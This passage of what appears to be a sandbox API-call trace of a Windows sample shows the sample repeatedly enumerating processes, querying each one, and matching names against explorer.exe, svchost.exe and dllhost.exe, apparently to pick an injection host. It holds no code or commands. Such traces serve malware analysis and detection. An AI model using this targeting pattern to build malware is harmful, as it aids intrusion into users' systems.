th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0178.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0178.901] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0178.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0178.901] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0178.901] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0178.902] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0178.902] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0178.903] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0178.903] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0178.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0178.904] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0178.904] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0178.905] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0178.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0178.905] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.905] CloseHandle (hObject=0xd8) returned 1 [0178.906] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0178.906] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0178.906] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0178.906] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0178.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0178.906] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0178.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0178.907] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.907] CloseHandle (hObject=0xd8) returned 1 [0178.907] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0178.907] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0178.907] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0178.907] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0178.907] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0178.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0178.908] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0178.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0178.908] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.908] CloseHandle (hObject=0xd8) returned 1 [0178.908] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0178.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0178.909] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.909] CloseHandle (hObject=0xd8) returned 1 [0178.909] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0178.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0178.909] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.910] CloseHandle (hObject=0xd8) returned 1 [0178.910] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0178.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0178.910] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.910] CloseHandle (hObject=0xd8) returned 1 [0178.910] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0178.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0178.911] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.911] CloseHandle (hObject=0xd8) returned 1 [0178.911] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0178.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0178.911] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.911] CloseHandle (hObject=0xd8) returned 1 [0178.911] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0178.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0178.912] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.912] CloseHandle (hObject=0xd8) returned 1 [0178.912] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0178.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0178.912] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.912] CloseHandle (hObject=0xd8) returned 1 [0178.912] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0178.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0178.913] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.913] CloseHandle (hObject=0xd8) returned 1 [0178.913] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0178.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0178.914] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.914] CloseHandle (hObject=0xd8) returned 1 [0178.914] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0178.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0178.914] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.914] CloseHandle (hObject=0xd8) returned 1 [0178.914] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0178.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0178.915] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.915] CloseHandle (hObject=0xd8) returned 1 [0178.915] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0178.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0178.915] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.915] CloseHandle (hObject=0xd8) returned 1 [0178.915] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0178.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0178.916] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.916] CloseHandle (hObject=0xd8) returned 1 [0178.916] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0178.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0178.916] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.917] CloseHandle (hObject=0xd8) returned 1 [0178.917] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0178.917] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0178.917] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.917] CloseHandle (hObject=0xd8) returned 1 [0178.917] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0178.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0178.918] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.918] CloseHandle (hObject=0xd8) returned 1 [0178.918] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0178.918] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0178.918] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.918] CloseHandle (hObject=0xd8) returned 1 [0178.918] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0178.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0178.919] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.919] CloseHandle (hObject=0xd8) returned 1 [0178.919] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0178.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0178.919] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.919] CloseHandle (hObject=0xd8) returned 1 [0178.919] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0178.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0178.920] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.920] CloseHandle (hObject=0xd8) returned 1 [0178.920] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0178.921] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.921] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0178.921] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0178.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0178.922] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.922] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0178.922] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0178.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0178.923] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0178.923] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0178.924] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.924] CloseHandle (hObject=0xd8) returned 1 [0178.924] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0178.924] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0178.924] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0178.924] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.924] CloseHandle (hObject=0xd8) returned 1 [0178.924] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0178.924] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0178.924] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0178.924] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0178.925] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0178.925] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.925] CloseHandle (hObject=0xd8) returned 1 [0178.925] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0178.926] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.926] CloseHandle (hObject=0xd8) returned 1 [0178.926] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0178.926] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.927] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0178.927] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.927] CloseHandle (hObject=0xd8) returned 1 [0178.927] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.927] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0178.928] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0178.928] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0178.928] CloseHandle (hObject=0xd8) returned 1 [0178.928] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0178.928] CloseHandle (hObject=0xd4) returned 1 [0178.928] Sleep (dwMilliseconds=0x3e8) [0179.939] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0179.941] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | 